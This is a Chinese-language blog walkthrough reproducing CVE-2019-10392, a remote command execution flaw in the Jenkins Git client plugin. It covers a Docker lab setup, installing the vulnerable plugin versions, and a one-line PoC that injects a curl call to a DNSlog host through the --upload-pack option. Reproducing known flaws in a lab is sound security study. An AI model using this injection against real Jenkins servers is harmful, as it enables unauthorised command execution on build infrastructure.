本篇文章給大家分享的是有關Jenkins Git client插件RCE漏洞CVE-2019-10392復現示例分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
0x00 簡介
Jenkins是一個開源軟件項目,是基于Java開發的一種持續集成工具,用于監控持續重復的工作,旨在提供一個開放易用的軟件平臺,使軟件的持續集成變成可能。
0x01 漏洞概述
Git客戶端插件中的系統命令執行漏洞,這是以允許具有Job/Configure權限的攻擊者在Jenkins主服務器上執行任意系統命令作為Jenkins進程正在運行的OS用戶的方式實現命令執行。
0x02 影響范圍
Git client Plugin <= 2.8.4
0x03 環境搭建
在線環境獲?。?/strong>
將本文轉發至朋友圈截圖發至公眾號內
自行搭建:
使用docker進行搭建
docker search Jenkinsdocker pull jenkins/jenkinsdocker run -d -p 8080:8080 -p 50000:50000 jenkins/jenkins
等待1~2分鐘后(啟動較慢),瀏覽器訪問ip:8080進入環境
docker exec -it 2d0c55ad015c /bin/bash #進入容器cat /var/jenkins_home/secrets/initialAdminPassword #獲取密碼
輸入密碼后繼續下一步,安裝推薦的插件,這個安裝過程要花比較長的時間,15~20分鐘
繼續下一步,創建一個管理員
繼續下一步,就進入了Jenkins主頁面
系統管理 -- 管理用戶 -- 新建用戶,創建一個user賬戶
然后進入:系統管理 -- 全局安全配置,為user賬戶配置如下權限
下載漏洞版本的插件(推薦安裝的都是官網的最新版本)
git客戶端:
http://updates.jenkins-ci.org/download/plugins/git-client/2.8.2/git-client.hpi
git插件:
http://updates.jenkins-ci.org/download/plugins/git/3.12.0/git.hpi
然后進入:系統管理 -- 插件管理 -- 高級,將兩個插件上傳
都上傳完后點擊下圖的‘安裝完成后重啟Jenkins’即可重新啟動服務
0x04 漏洞利用
重啟后,登錄user賬戶
新建任務 -- 流水線
確定后,點擊流水線
選擇以下選項,輸入Poc(使用dnslog檢測):
--upload-pack="`curl ysp8lf.dnslog.cn`"
查看dnslog,檢測到流量
以上就是Jenkins Git client插件RCE漏洞CVE-2019-10392復現示例分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。